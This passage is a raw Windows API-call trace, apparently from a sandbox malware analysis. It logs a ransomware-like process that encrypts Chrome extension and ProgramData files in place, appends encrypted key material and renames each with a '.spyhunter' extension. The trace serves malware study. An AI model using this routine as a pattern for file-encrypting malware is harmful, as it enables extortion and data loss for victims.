returned 1 [0134.135] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xd9, lpNumberOfBytesWritten=0x57f5dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f5dc*=0xd9, lpOverlapped=0x0) returned 1 [0134.136] GetProcessHeap () returned 0x2c0000 [0134.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0134.136] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.136] WriteFile (in: hFile=0x158, lpBuffer=0x57f61c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f5dc, lpOverlapped=0x0 | out: lpBuffer=0x57f61c*, lpNumberOfBytesWritten=0x57f5dc*=0x4, lpOverlapped=0x0) returned 1 [0134.138] WriteFile (in: hFile=0x158, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f5dc, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f5dc*=0x30, lpOverlapped=0x0) returned 1 [0134.138] CloseHandle (hObject=0x158) returned 1 [0134.138] GetProcessHeap () returned 0x2c0000 [0134.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.138] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json.spyhunter") returned 165 [0134.138] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json.spyhunter")) returned 1 [0134.139] GetProcessHeap () returned 0x2c0000 [0134.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.139] GetProcessHeap () returned 0x2c0000 [0134.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0134.139] GetProcessHeap () returned 0x2c0000 [0134.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e31a10 | out: hHeap=0x2c0000) returned 1 [0134.140] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f618 | out: pbBuffer=0x57f618) returned 1 [0134.140] GetProcessHeap () returned 0x2c0000 [0134.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0134.140] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f610*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f610*=0x30) returned 1 [0134.140] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0134.141] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json") returned 155 [0134.141] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.141] GetProcessHeap () returned 0x2c0000 [0134.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0134.141] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f5d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f5d4*=0xcb, lpOverlapped=0x0) returned 1 [0134.206] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff35, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.206] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xcb, lpNumberOfBytesWritten=0x57f5d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f5d4*=0xcb, lpOverlapped=0x0) returned 1 [0134.207] GetProcessHeap () returned 0x2c0000 [0134.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0134.207] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.207] WriteFile (in: hFile=0x158, lpBuffer=0x57f614*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f5d4, lpOverlapped=0x0 | out: lpBuffer=0x57f614*, lpNumberOfBytesWritten=0x57f5d4*=0x4, lpOverlapped=0x0) returned 1 [0134.207] WriteFile (in: hFile=0x158, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f5d4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f5d4*=0x30, lpOverlapped=0x0) returned 1 [0134.207] CloseHandle (hObject=0x158) returned 1 [0134.207] GetProcessHeap () returned 0x2c0000 [0134.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.207] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json.spyhunter") returned 165 [0134.207] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json.spyhunter")) returned 1 [0134.208] GetProcessHeap () returned 0x2c0000 [0134.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.208] GetProcessHeap () returned 0x2c0000 [0134.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0134.208] GetProcessHeap () returned 0x2c0000 [0134.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0fdf8 | out: hHeap=0x2c0000) returned 1 [0134.208] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f610 | out: pbBuffer=0x57f610) returned 1 [0134.208] GetProcessHeap () returned 0x2c0000 [0134.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0134.208] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f608*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f608*=0x30) returned 1 [0134.208] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.213] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm") returned 81 [0134.213] StrStrW (lpFirst="state.rsm", lpSrch=".txt") returned 0x0 [0134.214] GetProcessHeap () returned 0x2c0000 [0134.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0134.214] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f5cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f5cc*=0x28e, lpOverlapped=0x0) returned 1 [0134.214] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffd72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.214] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x57f5cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f5cc*=0x28e, lpOverlapped=0x0) returned 1 [0134.215] GetProcessHeap () returned 0x2c0000 [0134.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0134.215] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.215] WriteFile (in: hFile=0xec, lpBuffer=0x57f60c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f5cc, lpOverlapped=0x0 | out: lpBuffer=0x57f60c*, lpNumberOfBytesWritten=0x57f5cc*=0x4, lpOverlapped=0x0) returned 1 [0134.216] WriteFile (in: hFile=0xec, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f5cc, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f5cc*=0x30, lpOverlapped=0x0) returned 1 [0134.216] CloseHandle (hObject=0xec) returned 1 [0134.216] GetProcessHeap () returned 0x2c0000 [0134.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0134.216] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.spyhunter") returned 91 [0134.216] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.spyhunter" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.spyhunter")) returned 1 [0134.522] GetProcessHeap () returned 0x2c0000 [0134.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0134.523] GetProcessHeap () returned 0x2c0000 [0134.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0134.523] GetProcessHeap () returned 0x2c0000 [0134.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8cce8 | out: hHeap=0x2c0000) returned 1 [0134.523] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f610 | out: pbBuffer=0x57f610) returned 1 [0134.523] GetProcessHeap () returned 0x2c0000 [0134.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0134.523] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f608*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f608*=0x30) returned 1 [0134.523] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.525] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json") returned 156 [0134.525] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.525] GetProcessHeap () returned 0x2c0000 [0134.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.525] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f5cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f5cc*=0x11d, lpOverlapped=0x0) returned 1 [0134.526] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffee3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.526] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x11d, lpNumberOfBytesWritten=0x57f5cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f5cc*=0x11d, lpOverlapped=0x0) returned 1 [0134.526] GetProcessHeap () returned 0x2c0000 [0134.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.527] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.527] WriteFile (in: hFile=0xec, lpBuffer=0x57f60c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f5cc, lpOverlapped=0x0 | out: lpBuffer=0x57f60c*, lpNumberOfBytesWritten=0x57f5cc*=0x4, lpOverlapped=0x0) returned 1 [0134.527] WriteFile (in: hFile=0xec, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f5cc, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f5cc*=0x30, lpOverlapped=0x0) returned 1 [0134.527] CloseHandle (hObject=0xec) returned 1 [0134.527] GetProcessHeap () returned 0x2c0000 [0134.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0134.527] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json.spyhunter") returned 166 [0134.527] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json.spyhunter")) returned 1 [0134.528] GetProcessHeap () returned 0x2c0000 [0134.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0134.528] GetProcessHeap () returned 0x2c0000 [0134.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0134.528] GetProcessHeap () returned 0x2c0000 [0134.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f18780 | out: hHeap=0x2c0000) returned 1 [0134.529] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f608 | out: pbBuffer=0x57f608) returned 1 [0134.529] GetProcessHeap () returned 0x2c0000 [0134.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0134.529] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f600*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f600*=0x30) returned 1 [0134.529] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.564] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json") returned 156 [0134.564] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.564] GetProcessHeap () returned 0x2c0000 [0134.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.564] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f5c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f5c4*=0xfe, lpOverlapped=0x0) returned 1 [0134.565] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.565] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x57f5c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f5c4*=0xfe, lpOverlapped=0x0) returned 1 [0134.565] GetProcessHeap () returned 0x2c0000 [0134.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.565] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.566] WriteFile (in: hFile=0xec, lpBuffer=0x57f604*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f5c4, lpOverlapped=0x0 | out: lpBuffer=0x57f604*, lpNumberOfBytesWritten=0x57f5c4*=0x4, lpOverlapped=0x0) returned 1 [0134.566] WriteFile (in: hFile=0xec, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f5c4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f5c4*=0x30, lpOverlapped=0x0) returned 1 [0134.566] CloseHandle (hObject=0xec) returned 1 [0134.566] GetProcessHeap () returned 0x2c0000 [0134.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0134.566] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json.spyhunter") returned 166 [0134.566] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json.spyhunter")) returned 1 [0134.567] GetProcessHeap () returned 0x2c0000 [0134.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0134.567] GetProcessHeap () returned 0x2c0000 [0134.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0134.567] GetProcessHeap () returned 0x2c0000 [0134.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f18da0 | out: hHeap=0x2c0000) returned 1 [0134.568] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f600 | out: pbBuffer=0x57f600) returned 1 [0134.568] GetProcessHeap () returned 0x2c0000 [0134.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0134.568] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f5f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f5f8*=0x30) returned 1 [0134.568] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0134.611] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json") returned 156 [0134.611] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.611] GetProcessHeap () returned 0x2c0000 [0134.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0134.611] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f5bc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f5bc*=0xda, lpOverlapped=0x0) returned 1 [0134.612] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffff26, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.612] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xda, lpNumberOfBytesWritten=0x57f5bc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f5bc*=0xda, lpOverlapped=0x0) returned 1 [0134.612] GetProcessHeap () returned 0x2c0000 [0134.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0134.612] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.612] WriteFile (in: hFile=0x17c, lpBuffer=0x57f5fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f5bc, lpOverlapped=0x0 | out: lpBuffer=0x57f5fc*, lpNumberOfBytesWritten=0x57f5bc*=0x4, lpOverlapped=0x0) returned 1 [0134.612] WriteFile (in: hFile=0x17c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f5bc, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f5bc*=0x30, lpOverlapped=0x0) returned 1 [0134.612] CloseHandle (hObject=0x17c) returned 1 [0134.612] GetProcessHeap () returned 0x2c0000 [0134.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0134.612] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json.spyhunter") returned 166 [0134.612] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 